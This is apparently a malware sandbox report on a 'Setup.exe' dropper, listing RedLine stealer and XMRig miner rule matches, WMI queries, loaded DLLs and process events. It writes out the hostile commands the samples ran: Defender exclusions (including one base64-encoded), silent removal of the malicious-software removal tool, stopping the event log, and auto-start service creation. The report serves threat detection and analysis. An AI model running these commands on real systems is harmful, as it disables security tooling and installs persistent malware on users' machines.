Source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000036.00000002.2912448756.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@88/180@2/3
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F8560 GetLastError,FormatMessageW,WideCharToMultiByte, 6_2_00007FF7F04F8560
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File created: C:\Users\user\AppData\Local\SystemCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Global\yucvtrikidzunobm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\hamburger.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\activate.bat
Source: Setup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Notepad.exe")
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Setup.exe Virustotal: Detection: 59%
Source: C:\Users\user\Desktop\Setup.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\hamburger.exe "C:\Users\user\AppData\Local\Temp\hamburger.exe"
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\mergedALL.exe "C:\Users\user\AppData\Local\Temp\mergedALL.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\etc test.exe "C:\Users\user\AppData\Local\Temp\etc test.exe"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\fix.exe "C:\Users\user\AppData\Local\Temp\fix.exe"
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\activate.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBKZWAPS"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UPFRTHSI"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "UPFRTHSI" binpath= "C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe" start= "auto"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "OBKZWAPS"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "UPFRTHSI"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: unknown Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA=" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\hamburger.exe "C:\Users\user\AppData\Local\Temp\hamburger.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\mergedALL.exe "C:\Users\user\AppData\Local\Temp\mergedALL.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\etc test.exe "C:\Users\user\AppData\Local\Temp\etc test.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\fix.exe "C:\Users\user\AppData\Local\Temp\fix.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UPFRTHSI" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "UPFRTHSI" binpath= "C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe" start= "auto" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "UPFRTHSI" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBKZWAPS"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "OBKZWAPS"
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\activate.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Users\user\Desktop\Setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
